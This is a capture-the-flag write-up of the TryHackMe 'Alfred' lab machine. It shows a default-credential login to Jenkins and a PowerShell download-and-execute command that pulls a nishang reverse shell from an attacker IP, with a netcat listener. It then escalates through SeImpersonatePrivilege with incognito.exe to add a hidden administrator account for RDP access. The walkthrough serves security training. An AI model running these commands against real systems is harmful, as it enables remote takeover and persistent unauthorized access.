# TryHackMe Alfred writeup

[Alfred](https://tryhackme.com/room/alfred) is the second machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

# **Enumeration**

The output of the `nmap` scan:

```bash
nmap -sC -sV 10.10.0.34

80/tcp   open  Microsoft IIS httpd 7.5
3389/tcp open  ssl/ms-wbt-server?
8080/tcp open  Jetty 9.4.z-SNAPSHOT
```

Port `8080` contains `Jenkins` login page. According to `Jenkins` documentation, default credentials should be the `admin:password` pair, but this is not the case. The first option to check is other “default” password pairs. `admin:admin` will do the trick this time.

---

# **Exploitation**

A few words about `Jenkins` before we move on:

> *Jenkins – an open source automation server which enables developers around the world to reliably build, test, and deploy their software.*

From the attacker’s perspective, this is a goldmine. First, you can execute system commands with it. Second, already-created projects and builds might contain a ton of priceless data.

We can see that `Jenkins` already has a build for the project named, well, `project`.

Navigate to the configurations of the project:

```bash
http://10.10.0.34:8080/job/project/configure
```

We are looking for the `Build` section of it. You can see that to make a new build, `Jenkins` execute a `Windows bash command` and running `whoami` command. Let’s replace the `whoami` command and download a reverse shell to our `Kali Linux` machine.

A common way to do that with the Windows box is to use something like [nishang](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) `PowerShell` reverse shell.

Simply add the line to the end of the file:

```bash
Invoke-PowerShellTcp -Reverse -IPAddress 10.11.19.53 -Port 1337
```

Serve the HTTP server to host that file by executing the following command:

```bash
sudo python -m SimpleHTTPServer 80
```

Prepare a listener on the port `1337` with `nc`:

```bash
sudo nc -nlvp 1337
```

We are done with preparations on the `Kali Linux` side, let’s modify the `Build` command in `Jenkins` now. Replace the `whoami` with the following:

```bash
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.19.53/Invoke-PowerShellTcp.ps1')
```

Hit the `Build Now` and take a break for a second. `Jenkins` will make a new build and by doing that, it will also download and execute your reverse shell as a user `bruce`.

---

# **PrivEsc**

Let’s check what privileges the user `bruce` has:

```bash
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
```

The official guide covers only the way to do it with `Metasploit`, but of course, you can do the same without it.

The role `SeImpersonatePrivilege` allows you to impersonate a client. We can exploit that to gain privileged access to the local system. The official guide is also offering you the `incognito` module for `Metasploit`, but you can [download](https://github.com/milkdevil/incognito2) it as a stand-alone binary. Transfer `incognito.exe` to the machine in any preferred way. If you don’t have one, you can use this `PowerShell` one-liner:

```bash
(New-Object System.Net.WebClient).DownloadFile("https://<YOUR_IP>/<FILE_NAME>", "C:\<PATH_TO_THE_FILE><FILE_NAME>")  
```

When you will have your file on the box, you can impersonate `NT AUTHORITY\SYSTEM` token as the official guide recommends you, but you could also create a new user with admin rights:

```bash
PS C:\users\public\Documents> ./incognito.exe add_user carrotcake SuperSecretPassw0rd123                             
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.                                                
[*] Enumerating tokens                                                                                               
[*] Attempting to add user carrotcake to host 127.0.0.1                                                              
[+] Successfully added user                 


PS C:\users\public\Documents> ./incognito.exe add_localgroup_user Administrators carrotcake                          
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.                                                
[*] Enumerating tokens                                                                                               
[*] Attempting to add user carrotcake to local group Administrators on host 127.0.0.1                                
[+] Successfully added user to local group  
```

Here we are creating a new user `carrotcake` with the password `SuperSecretPassw0rd123` via `incognito.exe`, and then adding this account to the local group `Administrators`.

You can now try to log in to the box with a new account. We can use `RDP` protocol as the port `3389` is open:

```bash
rdesktop -u carrotcake -p SuperSecretPassw0rd123 10.10.0.34
```

OR you can use the tool `Remmina` instead of `rdesktop`. It has a built-in screenshot taker and works way more stable in my taste. [How to install Remmina](https://remmina.org/how-to-install-remmina/)

---

# Takeaway

* You don’t have to always look for a way to exploit the service. Sometimes you just need to use it
    
* Understanding the environment can help you to achieve your goals
    
* Creating a new user sometimes might be the easiest way to get persistent access to the system
